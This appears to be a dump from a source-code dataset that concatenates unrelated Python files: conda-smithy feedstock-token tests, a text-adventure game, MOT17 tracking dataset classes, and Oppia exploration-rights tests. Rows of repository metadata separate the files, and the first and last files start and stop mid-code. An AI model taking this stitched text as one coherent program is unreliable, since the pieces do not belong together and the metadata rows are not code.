generate_and_write_feedstock_token(user, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
def test_read_feedstock_token():
user = "bar"
repo = "foo"
pth = os.path.expanduser("~/.conda-smithy/bar_foo.token")
# no token
token, err = read_feedstock_token(user, repo)
assert "No token found in" in err
assert token is None
# empty
try:
os.system("touch " + pth)
token, err = read_feedstock_token(user, repo)
assert "Empty token found in" in err
assert token is None
finally:
if os.path.exists(pth):
os.remove(pth)
# token ok
try:
generate_and_write_feedstock_token(user, repo)
token, err = read_feedstock_token(user, repo)
assert err is None
assert token is not None
finally:
if os.path.exists(pth):
os.remove(pth)
@pytest.mark.parametrize("retval", [True, False])
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_token_exists(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project, retval
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "foo"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
if retval:
with open(
os.path.join(tmpdir, "tokens", "%s.json" % project), "w"
) as fp:
fp.write("blarg")
assert feedstock_token_exists(user, project, repo) is retval
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_token_raises(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
git_mock.Repo.clone_from.side_effect = ValueError("blarg")
user = "foo"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
with open(os.path.join(tmpdir, "tokens", "%s.json" % project), "w") as fp:
fp.write("blarg")
with pytest.raises(RuntimeError) as e:
feedstock_token_exists(user, project, repo)
assert "Testing for the feedstock token for" in str(e.value)
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_works(
gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
secrets_mock.token_hex.return_value = "fgh"
osuran_mock.return_value = b"\x80SA"
user = "foo"
project = "bar"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
pth = os.path.expanduser("~/.conda-smithy/foo_%s.token" % project)
token_json_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
try:
generate_and_write_feedstock_token(user, project)
register_feedstock_token(user, project, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
repo = git_mock.Repo.clone_from.return_value
repo.index.add.assert_called_once_with(token_json_pth)
repo.index.commit.assert_called_once_with(
"[ci skip] [skip ci] [cf admin skip] ***NO_CI*** added token for %s/%s"
% (user, project)
)
repo.remote.return_value.pull.assert_called_once_with(rebase=True)
repo.remote.return_value.push.assert_called_once_with()
salted_token = scrypt.hash("fgh", b"\x80SA", buflen=256)
data = {
"salt": b"\x80SA".hex(),
"hashed_token": salted_token.hex(),
}
with open(token_json_pth, "r") as fp:
assert json.load(fp) == data
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_notoken(
gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
secrets_mock.token_hex.return_value = "fgh"
osuran_mock.return_value = b"\x80SA"
user = "foo"
project = "bar"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")
token_json_pth = os.path.join(tmpdir, "tokens", "bar.json")
try:
with pytest.raises(RuntimeError) as e:
register_feedstock_token(user, project, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
git_mock.Repo.clone_from.assert_not_called()
repo = git_mock.Repo.clone_from.return_value
repo.index.add.assert_not_called()
repo.index.commit.assert_not_called()
repo.remote.return_value.pull.assert_not_called()
repo.remote.return_value.push.assert_not_called()
assert not os.path.exists(token_json_pth)
assert "No token found in" in str(e.value)
@pytest.mark.parametrize(
"repo", ["$GITHUB_TOKEN", "${GITHUB_TOKEN}", "$GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.secrets")
@mock.patch("conda_smithy.feedstock_tokens.os.urandom")
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_register_feedstock_token_exists_already(
gh_mock, git_mock, tmp_mock, osuran_mock, secrets_mock, tmpdir, repo
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
secrets_mock.token_hex.return_value = "fgh"
osuran_mock.return_value = b"\x80SA"
user = "foo"
project = "bar"
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")
token_json_pth = os.path.join(tmpdir, "tokens", "bar.json")
with open(token_json_pth, "w") as fp:
fp.write("blarg")
try:
generate_and_write_feedstock_token(user, project)
with pytest.raises(RuntimeError) as e:
register_feedstock_token(user, project, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
git_mock.Repo.clone_from.assert_called_once_with(
"abc123",
str(tmpdir),
depth=1,
)
repo = git_mock.Repo.clone_from.return_value
repo.index.add.assert_not_called()
repo.index.commit.assert_not_called()
repo.remote.return_value.pull.assert_not_called()
repo.remote.return_value.push.assert_not_called()
assert "Token for repo foo/bar already exists!" in str(e.value)
@pytest.mark.parametrize("drone", [True, False])
@pytest.mark.parametrize("circle", [True, False])
@pytest.mark.parametrize("azure", [True, False])
@pytest.mark.parametrize("travis", [True, False])
@pytest.mark.parametrize("clobber", [True, False])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers(
azure_mock,
travis_mock,
circle_mock,
drone_mock,
drone,
circle,
travis,
azure,
clobber,
):
user = "foo"
project = "bar"
pth = os.path.expanduser("~/.conda-smithy/foo_bar.token")
try:
generate_and_write_feedstock_token(user, project)
feedstock_token, _ = read_feedstock_token(user, project)
register_feedstock_token_with_proviers(
user,
project,
drone=drone,
circle=circle,
travis=travis,
azure=azure,
clobber=clobber,
drone_endpoints=[drone_default_endpoint],
)
if drone:
drone_mock.assert_called_once_with(
user,
project,
feedstock_token,
clobber,
drone_default_endpoint,
)
else:
drone_mock.assert_not_called()
if circle:
circle_mock.assert_called_once_with(
user, project, feedstock_token, clobber
)
else:
circle_mock.assert_not_called()
if travis:
travis_mock.assert_called_once_with(
user, project, feedstock_token, clobber
)
else:
travis_mock.assert_not_called()
if azure:
azure_mock.assert_called_once_with(
user, project, feedstock_token, clobber
)
else:
azure_mock.assert_not_called()
finally:
if os.path.exists(pth):
os.remove(pth)
@pytest.mark.parametrize("drone", [True, False])
@pytest.mark.parametrize("circle", [True, False])
@pytest.mark.parametrize("azure", [True, False])
@pytest.mark.parametrize("travis", [True, False])
@pytest.mark.parametrize("clobber", [True, False])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers_notoken(
azure_mock,
travis_mock,
circle_mock,
drone_mock,
drone,
circle,
travis,
azure,
clobber,
):
user = "foo"
project = "bar"
with pytest.raises(RuntimeError) as e:
register_feedstock_token_with_proviers(
user,
project,
drone=drone,
circle=circle,
travis=travis,
azure=azure,
clobber=clobber,
)
assert "No token" in str(e.value)
drone_mock.assert_not_called()
circle_mock.assert_not_called()
travis_mock.assert_not_called()
azure_mock.assert_not_called()
@pytest.mark.parametrize("provider", ["drone", "circle", "travis", "azure"])
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_drone")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_circle")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_travis")
@mock.patch("conda_smithy.feedstock_tokens.add_feedstock_token_to_azure")
def test_register_feedstock_token_with_proviers_error(
azure_mock,
travis_mock,
circle_mock,
drone_mock,
provider,
):
user = "foo"
project = "bar-feedstock"
pth = os.path.expanduser("~/.conda-smithy/foo_bar-feedstock.token")
if provider == "drone":
drone_mock.side_effect = ValueError("blah")
if provider == "circle":
circle_mock.side_effect = ValueError("blah")
if provider == "travis":
travis_mock.side_effect = ValueError("blah")
if provider == "azure":
azure_mock.side_effect = ValueError("blah")
try:
generate_and_write_feedstock_token(user, project)
feedstock_token, _ = read_feedstock_token(user, project)
with pytest.raises(RuntimeError) as e:
register_feedstock_token_with_proviers(
user, project, drone_endpoints=[drone_default_endpoint]
)
assert "on %s" % provider in str(e.value)
finally:
if os.path.exists(pth):
os.remove(pth)
| 30.883677 | 79 | 0.678513 | 2,115 | 16,461 | 4.983452 | 0.069976 | 0.091651 | 0.055787 | 0.079696 | 0.883586 | 0.835104 | 0.806357 | 0.790228 | 0.75389 | 0.737097 | 0 | 0.004005 | 0.1961 | 16,461 | 532 | 80 | 30.941729 | 0.792488 | 0.002734 | 0 | 0.716895 | 1 | 0.002283 | 0.197855 | 0.119737 | 0 | 0 | 0 | 0 | 0.111872 | 1 | 0.02968 | false | 0 | 0.015982 | 0 | 0.045662 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dbaf612f66a21c44f1bb0d0e6c2a692a770c3af8 | 8,529 | py | Python | treasure-island.py | the-cryptozoologist/python-bootcamp | 2f54dbf0594fd179e722998898abebf932f176cf | [
"MIT"
] | null | null | null | treasure-island.py | the-cryptozoologist/python-bootcamp | 2f54dbf0594fd179e722998898abebf932f176cf | [
"MIT"
] | null | null | null | treasure-island.py | the-cryptozoologist/python-bootcamp | 2f54dbf0594fd179e722998898abebf932f176cf | [
"MIT"
] | null | null | null | print('''
*******************************************************************************
| | | |
_________|________________.=""_;=.______________|_____________________|_______
| | ,-"_,="" `"=.| |
|___________________|__"=._o`"-._ `"=.______________|___________________
| `"=._o`"=._ _`"=._ |
_________|_____________________:=._o "=._."_.-="'"=.__________________|_______
| | __.--" , ; `"=._o." ,-"""-._ ". |
|___________________|_._" ,. .` ` `` , `"-._"-._ ". '__|___________________
| |o`"=._` , "` `; .". , "-._"-._; ; |
_________|___________| ;`-.o`"=._; ." ` '`."\` . "-._ /_______________|_______
| | |o; `"-.o`"=._`` '` " ,__.--o; |
|___________________|_| ; (#) `-.o `"=.`_.--"_o.-; ;___|___________________
____/______/______/___|o;._ " `".o|o_.--" ;o;____/______/______/____
/______/______/______/_"=._o--._ ; | ; ; ;/______/______/______/_
____/______/______/______/__"=._o--._ ;o|o; _._;o;____/______/______/____
/______/______/______/______/____"=._o._; | ;_.--"o.--"_/______/______/______/_
____/______/______/______/______/_____"=.o|o_.--""___/______/______/______/____
/______/______/______/______/______/______/______/______/______/______/______/_
*******************************************************************************
''')
def game():
print("Welcome to Treasure Island.")
print("Your mission is to find the treasure.")
print('You\'re at a crossroad. Where do you want to go?\n')
cross = input()
if cross == 'right':
print("You fell down a rabbit hole! Game Over.")
return
elif cross == 'left':
swim_or_wait = input('You\'ve come to a lake. There is an island in the middle of the lake. Type "wait" to wait for a boat. Type "swim" to swim across.\n')
while True:
if swim_or_wait == 'swim':
print("You got attacked by a shrimp! Game Over.")
return
elif swim_or_wait == 'wait':
door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
else:
door = input('You chose a door that doesn\'t exist. Try again.')
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
return
else:
swim_or_wait = input('Sorry none can do. Do you want to "swim" or "wait"?\n')
while True:
if swim_or_wait == 'swim':
print("You got attacked by a shrimp! Game Over.")
return
elif swim_or_wait == 'wait':
door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
else:
door = input('You chose a door that doesn\'t exist. Try again.')
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
return
else:
cross = input('There is no turning back. Do you want to go right or left?\n')
if cross == 'right':
print("You fell down a rabbit hole! Game Over.")
return
elif cross == 'left':
swim_or_wait = input('You\'ve come to a lake. There is an island in the middle of the lake. Type "wait" to wait for a boat. Type "swim" to swim across.\n')
while True:
if swim_or_wait == 'swim':
print("You got attacked by a shrimp! Game Over.")
return
elif swim_or_wait == 'wait':
door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
else:
door = input('You chose a door that doesn\'t exist. Try again.')
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
return
else:
swim_or_wait = input('Sorry none can do. Do you want to "swim" or "wait"?\n')
while True:
if swim_or_wait == 'swim':
print("You got attacked by a shrimp! Game Over.")
return
elif swim_or_wait == 'wait':
door = input("You arrive at the island unharmed. There is a house with 3 doors. One red, one yellow and one blue. Which color do you choose?\n")
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
else:
door = input('You chose a door that doesn\'t exist. Try again.')
while True:
if door == 'blue':
print('You enter a room of murderous kittens. Game Over.')
return
elif door == 'red':
print('The room is on fire! This is not fine, Game Over.')
return
elif door == 'yellow':
print('You found the treasure! You Win.')
return
while input('Do you want to play a game? [y/n]\n') == 'y':
game()
break
| 49.877193 | 166 | 0.43698 | 811 | 8,529 | 3.782984 | 0.122072 | 0.014993 | 0.021512 | 0.129074 | 0.935463 | 0.926988 | 0.926988 | 0.926988 | 0.926988 | 0.926988 | 0 | 0.000834 | 0.437566 | 8,529 | 170 | 167 | 50.170588 | 0.638733 | 0 | 0 | 0.811688 | 0 | 0.077922 | 0.463969 | 0.111803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006494 | false | 0 | 0 | 0 | 0.175325 | 0.220779 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91949a482ca7a379ceeff431ac5f41629ebd5ae0 | 3,311 | py | Python | dataset/mot17.py | BoPang1996/TubeTK | bcca334c5348f9ae33e04595e1af93cf8351e50e | [
"MIT"
] | 142 | 2020-05-06T01:28:43.000Z | 2022-02-23T11:03:27.000Z | dataset/mot17.py | BoPang1996/TubeTK | bcca334c5348f9ae33e04595e1af93cf8351e50e | [
"MIT"
] | 15 | 2020-06-18T02:25:09.000Z | 2021-11-04T13:45:05.000Z | dataset/mot17.py | BoPang1996/TubeTK | bcca334c5348f9ae33e04595e1af93cf8351e50e | [
"MIT"
] | 25 | 2020-06-11T04:15:49.000Z | 2022-03-17T09:50:15.000Z | import torch.utils.data as data
import random
from PIL import ImageFile
from dataset.augmentation import SSJAugmentation
from dataset.Parsers.MOT17 import GTParser_MOT_17
ImageFile.LOAD_TRUNCATED_IMAGES = True
class MOT17TrainDataset(data.Dataset):
'''
The class is the dataset for train, which read gt.txt file and rearrange them as the tracks set.
it can be selected from the specified frame
'''
def __init__(self,
mot_root,
epoch,
arg,
transform=SSJAugmentation,
):
# 1. init all the variables
self.mot_root = mot_root
self.transform = transform(size=arg.img_size, type='train')
self.epoch = epoch
# 2. init GTParser
self.parser = GTParser_MOT_17(self.mot_root, 'train', forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
value_range=arg.value_range)
def __getitem__(self, item):
item = item % len(self.parser)
image, img_meta, tubes, labels, start_frame = self.parser[item]
while image is None:
item = item + 50
image, img_meta, tubes, labels, start_frame = self.parser[item % len(self.parser)]
print('None processing.')
if self.transform is None:
return image, img_meta, tubes, labels, start_frame
else:
image, img_meta, tubes, labels, start_frame = self.transform(image, img_meta, tubes, labels, start_frame)
return image, img_meta, tubes, labels, start_frame
def __len__(self):
return len(self.parser) * self.epoch
class MOT17TestDataset(data.Dataset):
'''
The class is the dataset for train, which read gt.txt file and rearrange them as the tracks set.
it can be selected from the specified frame
'''
def __init__(self,
mot_root,
epoch,
type,
test_seq,
arg,
transform=SSJAugmentation,
):
# 1. init all the variables
self.mot_root = mot_root
self.transform = transform(size=arg.img_size, type='test')
self.epoch = epoch
# 2. init GTParser
self.parser = GTParser_MOT_17(self.mot_root, type, test_seq=test_seq, forward_frames=arg.forward_frames,
frame_stride=arg.frame_stride, min_vis=arg.min_visibility,
value_range=arg.value_range)
def __getitem__(self, item):
item = item % len(self.parser)
image, img_meta, tubes, labels, start_frame = self.parser[item]
while image is None:
image, img_meta, tubes, labels, start_frame = self.parser[(item+random.randint(-10, 10)) % len(self.parser)]
print('None processing.')
if self.transform is None:
return image, img_meta, tubes, labels, start_frame
else:
image, img_meta, tubes, labels, start_frame = self.transform(image, img_meta, tubes, labels, start_frame)
return image, img_meta, tubes, labels, start_frame
def __len__(self):
return len(self.parser) * self.epoch
| 36.788889 | 120 | 0.604047 | 404 | 3,311 | 4.740099 | 0.215347 | 0.062663 | 0.075196 | 0.106527 | 0.848042 | 0.848042 | 0.848042 | 0.848042 | 0.848042 | 0.848042 | 0 | 0.009687 | 0.314105 | 3,311 | 89 | 121 | 37.202247 | 0.833554 | 0.111145 | 0 | 0.721311 | 0 | 0 | 0.015862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098361 | false | 0 | 0.081967 | 0.032787 | 0.311475 | 0.032787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
91a2d1d9cab1c122918e97f2460ac493fa64c73c | 37,066 | py | Python | core/domain/rights_manager_test.py | Himanshu1495/oppia | 8a3a4d6ff633aca12bbd043648a2d45ccdd583e9 | [
"Apache-2.0"
] | null | null | null | core/domain/rights_manager_test.py | Himanshu1495/oppia | 8a3a4d6ff633aca12bbd043648a2d45ccdd583e9 | [
"Apache-2.0"
] | null | null | null | core/domain/rights_manager_test.py | Himanshu1495/oppia | 8a3a4d6ff633aca12bbd043648a2d45ccdd583e9 | [
"Apache-2.0"
] | 1 | 2021-09-22T10:37:34.000Z | 2021-09-22T10:37:34.000Z | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for classes and methods relating to user rights."""
from core.domain import collection_services
from core.domain import exp_domain
from core.domain import exp_services
from core.domain import rights_manager
from core.tests import test_utils
import feconf
class ExplorationRightsTests(test_utils.GenericTestBase):
"""Test that rights for actions on explorations work as expected."""
EXP_ID = 'exp_id'
def setUp(self):
super(ExplorationRightsTests, self).setUp()
self.signup('a@example.com', 'A')
self.signup('b@example.com', 'B')
self.signup('c@example.com', 'C')
self.signup('d@example.com', 'D')
self.signup('e@example.com', 'E')
self.signup(self.ADMIN_EMAIL, username=self.ADMIN_USERNAME)
self.user_id_a = self.get_user_id_from_email('a@example.com')
self.user_id_b = self.get_user_id_from_email('b@example.com')
self.user_id_c = self.get_user_id_from_email('c@example.com')
self.user_id_d = self.get_user_id_from_email('d@example.com')
self.user_id_e = self.get_user_id_from_email('e@example.com')
self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
def test_get_exploration_rights_for_nonexistent_exploration(self):
non_exp_id = 'this_exp_does_not_exist_id'
with self.assertRaisesRegexp(
Exception,
'Entity for class ExplorationRightsModel with id '
'this_exp_does_not_exist_id not found'
):
rights_manager.get_exploration_rights(non_exp_id)
self.assertIsNone(
rights_manager.get_exploration_rights(non_exp_id, strict=False))
def test_demo_exploration(self):
exp_services.load_demo('1')
rights_manager.release_ownership_of_exploration(
feconf.SYSTEM_COMMITTER_ID, '1')
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertFalse(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '1'))
def test_non_splash_page_demo_exploration(self):
# Note: there is no difference between permissions for demo
# explorations, whether or not they are on the splash page.
exp_services.load_demo('3')
rights_manager.release_ownership_of_exploration(
feconf.SYSTEM_COMMITTER_ID, '3')
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(rights_manager.Actor(
self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertFalse(rights_manager.Actor(
self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(rights_manager.Actor(
self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, '3'))
def test_ownership_of_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_a).is_owner(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).is_owner(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).is_owner(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_newly_created_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_a).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_admin).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_admin).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
def test_inviting_collaborator_to_exploration(self):
exp = exp_domain.Exploration.create_default_exploration(
self.EXP_ID, 'A title', 'A category')
exp_services.save_new_exploration(self.user_id_a, exp)
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
rights_manager.Actor(self.user_id_b).can_delete(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
rights_manager.assign_role_for_exploration(
self.user_id_a, self.EXP_ID, self.user_id_b,
rights_manager.ROLE_EDITOR)
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_play(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_view(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertTrue(
rights_manager.Actor(self.user_id_b).can_edit(
rights_manager.ACTIVITY_TYPE_EXPLORATION, self.EXP_ID))
self.assertFalse(
